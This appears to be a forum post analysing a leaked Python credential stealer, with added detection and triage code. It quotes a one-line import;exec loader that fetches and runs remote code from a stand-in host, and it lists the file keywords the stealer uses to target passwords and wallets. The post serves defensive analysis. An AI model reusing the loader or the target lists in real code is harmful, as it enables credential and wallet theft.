A simple leaked stealer that just got renamed (still bad)
I don't have that much to say, except that using "Fernet" is not that useful, nor is making a fake blocked page, and just being the
The stealer is hidden inside a lot of programs (fake stealers, fake tools, etc.) using the ";" technique, a single import line that also runs exec():
import requests ;exec("code")
It does a requests.get() to a website and strips the HTML tags to recover the code hidden inside a fake Cloudflare "blocked" page; that text is what gets passed to exec().
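To make the two halves of that trick concrete, here is an added example (my code, not the leaked stealer's): a constructed decoy "blocked" page with a payload hidden in it, the tag-stripping step a loader would perform, and a scanner that flags the one-line import;exec() loader in a .py file. The page layout (payload inside a display:none element), the sample page, the sample tool source and the example.invalid host are all assumptions made for illustration; nothing is fetched and nothing is executed.

```python
"""Added example, not code from the leaked stealer: how the ';' loader and
the fake "blocked" page fit together, plus a scanner for the loader line.

Assumption (not stated in the post): the payload sits inside a display:none
element of the decoy page, so dropping the visible markup leaves the code.
"""
import re
from html.parser import HTMLParser

# Constructed sample of a decoy "Cloudflare blocked" page. Nothing is
# fetched; the text a real loader would requests.get() is embedded here.
FAKE_BLOCKED_PAGE = """<!doctype html>
<html><head><title>Attention Required! | Cloudflare</title></head>
<body>
<h1>Sorry, you have been blocked</h1>
<p>You are unable to access example.invalid<br>Ray ID: 0000</p>
<div style="display: none">
print('stage 2 would run here')
</div>
</body></html>
"""

# Constructed sample of a "tool" that smuggles the one-line loader into a
# harmless-looking import block.
FAKE_TOOL_SOURCE = """
import os
import requests ;exec(requests.get('http://example.invalid/').text)

def main():
    print('fake tool')
"""

# One line: an import statement, a ';', then exec(...) on whatever follows.
LOADER_RE = re.compile(
    r"^\s*(?:import\s+[^;\n]+|from\s+\S+\s+import\s+[^;\n]+?)\s*;\s*exec\s*\("
)

# Elements that never get a closing tag; they must not touch the stack.
VOID_TAGS = {"br", "img", "meta", "link", "input", "hr"}


class HiddenTextExtractor(HTMLParser):
    """Collect only the text inside elements styled display:none."""

    def __init__(self):
        super().__init__()
        self.depth = 0      # > 0 while inside a hidden element
        self.stack = []     # one flag per open element: is it hidden?
        self.parts = []

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        style = (dict(attrs).get("style") or "").replace(" ", "").lower()
        inside = self.depth > 0 or "display:none" in style
        self.stack.append(inside)
        if inside:
            self.depth += 1

    def handle_endtag(self, tag):
        if tag in VOID_TAGS or not self.stack:
            return
        if self.stack.pop():
            self.depth -= 1

    def handle_data(self, data):
        if self.depth > 0:
            self.parts.append(data)


def extract_hidden_code(page_html):
    """Mimic the loader: drop the decoy markup, keep the hidden payload."""
    parser = HiddenTextExtractor()
    parser.feed(page_html)
    parser.close()
    return "".join(parser.parts).strip()


def find_loaders(source):
    """Return the lines of a .py file that use the import;exec() trick."""
    return [line.strip() for line in source.splitlines() if LOADER_RE.match(line)]


if __name__ == "__main__":
    print("hidden payload:", extract_hidden_code(FAKE_BLOCKED_PAGE))
    for hit in find_loaders(FAKE_TOOL_SOURCE):
        print("loader line:", hit)
```

Run find_loaders() over every .py in a "free tool" before you touch it; a loader that fetches its real body from a web page is the part that matters, and it fits on a line that is easy to miss next to ordinary imports.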
The stealer seems original, but it is still pretty bad; nothing very advanced.
What it steals:
- Browser data (history, cookies, passwords and more!)
- Telegram files
- Discord tokens
- It injects a modified asar file into Exodus
- It searches the whole computer for these:
Passwords and account information: files whose name contains one of: passw, mdp, motdepasse, mot_de_passe, login, secret, account, acount, paypal, banque, compte
Cryptocurrency and security: metamask, wallet, crypto, exodus, 2fa, token, backup, memo, seecret
Communication and miscellaneous: discord, code
It checks that the file exists and then that its extension is one of these:
Text and document files:
- .txt, .log, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .pdf, .rtf, .json, .csv, .db
Image and video files:
- .jpg, .jpeg, .png, .gif, .webp, .mp4
And even more data!
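An added example (mine, not the stealer's code) that turns the two lists above into a triage tool: run it over your own directories and it reports which files this stealer's name-plus-extension filter would have selected, and which keyword caused each hit. It assumes the keyword test is a case-insensitive substring match on the file name (the post says "file with those name" and nothing more precise), and it only knows the lists printed above, so treat its output as a lower bound. The sample paths are constructed and do not exist.

```python
"""Added example, not code from the leaked stealer: apply the post's keyword
and extension lists to file names to see what would have been grabbed.

Assumptions not stated in the post: the keyword test is a case-insensitive
substring match on the file name, and the lists below are all there is
(the post says "and even more", so hits are a lower bound).
"""
import os
from pathlib import PurePath

# Keywords as the post lists them, including the stealer's own typos
# ("acount", "seecret"), which are part of the match list as written.
NAME_KEYWORDS = (
    "passw", "mdp", "motdepasse", "mot_de_passe", "login", "secret",
    "account", "acount", "paypal", "banque", "compte",
    "metamask", "wallet", "crypto", "exodus", "2fa", "token", "backup",
    "memo", "seecret",
    "discord", "code",
)

# Extensions as the post lists them.
TARGET_EXTENSIONS = {
    ".txt", ".log", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx",
    ".odt", ".pdf", ".rtf", ".json", ".csv", ".db",
    ".jpg", ".jpeg", ".png", ".gif", ".webp", ".mp4",
}


def matching_keywords(path):
    """Keywords found in the file name; an empty tuple means no hit."""
    name = PurePath(path).name.lower()
    return tuple(k for k in NAME_KEYWORDS if k in name)


def matches_target(path):
    """True if the name+extension filter would select this file."""
    if not matching_keywords(path):
        return False
    return PurePath(path).suffix.lower() in TARGET_EXTENSIONS


def triage(paths):
    """Map each selected path to the keywords that caused the hit."""
    return {p: matching_keywords(p) for p in paths if matches_target(p)}


def scan_directory(root):
    """Walk a real directory tree and triage every file in it."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            found.append(os.path.join(dirpath, f))
    return triage(found)


# Constructed sample paths (no such files exist; this is an offline demo).
SAMPLE_PATHS = [
    "/home/user/Desktop/mot_de_passe.txt",
    "/home/user/Documents/wallet_backup.pdf",
    "/home/user/Pictures/holiday.jpg",
    "/home/user/.config/vscode-settings.json",
    "/home/user/wallet.exe",   # keyword hit, but .exe is not on the list
]

if __name__ == "__main__":
    for path, why in triage(SAMPLE_PATHS).items():
        print(f"{path}  <- {', '.join(why)}")
```

Note how broad the filter is: "code" and "token" match things like vscode-settings.json, so the search pulls in plenty of junk next to the real secrets, which fits the "nothing very advanced" verdict above.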
If at some point you feel like "using" it, don't; it is shit.
RUN IN A VM